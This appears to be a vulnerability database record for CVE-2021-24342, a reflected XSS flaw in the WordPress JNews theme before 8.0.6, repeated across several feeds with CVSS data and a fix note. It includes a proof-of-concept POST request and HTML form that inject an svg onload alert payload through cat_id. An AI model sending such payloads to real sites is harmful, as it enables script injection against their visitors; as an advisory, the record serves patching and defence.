Description
The theme did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.
### PoC
POST /?ajax-request=jnews HTTP/1.1 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 130 Connection: close lang=en_US&cat;_id=6">&action;=jnews_build_mega_category_2&number;=6&tags;=70%2C64%2C10%2C67
Affected Software
CPE Name
Name
Version
jnews
8.0.6
Related
{"id": "WPVDB-ID:415CA763-FE65-48CB-ACD3-B375A400217E", "type": "wpvulndb", "bulletinFamily": "software", "title": "JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)", "description": "The theme did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.\n\n### PoC\n\nPOST /?ajax-request=jnews HTTP/1.1 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 130 Connection: close lang=en_US&cat;_id=6\">&action;=jnews_build_mega_category_2&number;=6&tags;=70%2C64%2C10%2C67 \n", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T07:02:58", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e", "reporter": "Truoc Phan", "references": [], "cvelist": ["CVE-2021-24342"], "immutableFields": [], "lastseen": "2021-09-14T23:11:59", "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24342"]}, {"type": "patchstack", "idList": ["PATCHSTACK:048FB6A9AD6E12EDBDA8B71AA7323CE3"]}, {"type": "wpexploit", "idList": ["WPEX-ID:415CA763-FE65-48CB-ACD3-B375A400217E"]}]}, "score": {"value": 0.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24342"]}, {"type": "wpexploit", "idList": ["WPEX-ID:415CA763-FE65-48CB-ACD3-B375A400217E"]}]}, "exploitation": null, "vulnersScore": 0.6}, "affectedSoftware": [{"version": "8.0.6", "operator": "lt", "name": "jnews"}], "exploit": "POST /?ajax-request=jnews HTTP/1.1\r\nAccept: text/html, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 130\r\nConnection: close\r\n\r\nlang=en_US&cat_id=6\"><svg/onload=alert(/XSS/)>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\r\n\r\n\r\n<html>\r\n <body>\r\n <form action=\"https://example.com/?ajax-request=jnews\" method=\"POST\">\r\n <input type=\"hidden\" name=\"lang\" value=\"en_US\" />\r\n <input type=\"hidden\" name=\"cat_id\" value=\"6"><svg/onload=alert(/XSS/)>\" />\r\n <input type=\"hidden\" name=\"action\" value=\"jnews_build_mega_category_2\" />\r\n <input type=\"hidden\" name=\"number\" value=\"6\" />\r\n <input type=\"hidden\" name=\"tags\" value=\"70,64,10,67\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n", "sourceData": "", "generation": 0, "_state": {"dependencies": 1660004461, "score": 1660007784}, "_internal": {"score_hash": "8f207ded36d17a533dd3bfb1fd236540"}}
{"patchstack": [{"lastseen": "2022-06-01T19:32:13", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by Truoc Phan in WordPress JNews premium theme (versions <= 8.0.5).\n\n## Solution\n\n\r\n Update the WordPress JNews premium theme to the latest available version (at least 8.0.6).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-05-24T00:00:00", "type": "patchstack", "title": "WordPress JNews premium theme <= 8.0.5 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24342"], "modified": "2021-05-24T00:00:00", "id": "PATCHSTACK:048FB6A9AD6E12EDBDA8B71AA7323CE3", "href": "https://patchstack.com/database/vulnerability/jnews/wordpress-jnews-premium-theme-8-0-5-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T14:52:29", "description": "The JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-07T11:15:00", "type": "cve", "title": "CVE-2021-24342", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24342"], "modified": "2021-06-10T23:59:00", "cpe": [], "id": "CVE-2021-24342", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24342", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "wpexploit": [{"lastseen": "2021-09-14T23:11:59", "description": "The theme did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-24T00:00:00", "type": "wpexploit", "title": "JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24342"], "modified": "2021-05-24T07:02:58", "id": "WPEX-ID:415CA763-FE65-48CB-ACD3-B375A400217E", "href": "", "sourceData": "POST /?ajax-request=jnews HTTP/1.1\r\nAccept: text/html, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 130\r\nConnection: close\r\n\r\nlang=en_US&cat_id=6\"><svg/onload=alert(/XSS/)>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\r\n\r\n\r\n<html>\r\n <body>\r\n <form action=\"https://example.com/?ajax-request=jnews\" method=\"POST\">\r\n <input type=\"hidden\" name=\"lang\" value=\"en_US\" />\r\n <input type=\"hidden\" name=\"cat_id\" value=\"6"><svg/onload=alert(/XSS/)>\" />\r\n <input type=\"hidden\" name=\"action\" value=\"jnews_build_mega_category_2\" />\r\n <input type=\"hidden\" name=\"number\" value=\"6\" />\r\n <input type=\"hidden\" name=\"tags\" value=\"70,64,10,67\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}